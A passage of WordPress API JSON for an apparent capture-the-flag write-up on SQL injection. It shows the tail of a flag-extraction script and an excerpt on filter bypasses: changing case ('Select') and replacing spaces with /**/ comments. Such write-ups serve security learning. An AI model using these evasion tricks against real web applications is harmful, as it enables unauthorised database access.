class=\"wp-block-paragraph\">&nbsp; &nbsp; column_name = getcolumn(table_name)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp; &nbsp; print(getflag(table_name,column_name))<\/p>\n","protected":false},"excerpt":{"rendered":"<p>176 \u5927\u5c0f\u5199\u7ed5\u8fc7\uff0cselect\u6539\u4e3aSelect 177\u7a7a\u683c\u7ed5\u8fc7 \u6539\u4e3a\/**\/\uff08\u6ce8\u91ca\u7b26\uff09 178\u7a7a\u683c\u7ed5\u8fc7 \u6539\u4e3a [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-78","post","type-post","status-publish","format-standard","hentry","category-web"],"_links":{"self":[{"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/posts\/78","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/comments?post=78"}],"version-history":[{"count":6,"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/posts\/78\/revisions"}],"predecessor-version":[{"id":121,"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/posts\/78\/revisions\/121"}],"wp:attachment":[{"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/media?parent=78"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/categories?post=78"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mdhei.xyz\/index.php\/wp-json\/wp\/v2\/tags?post=78"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}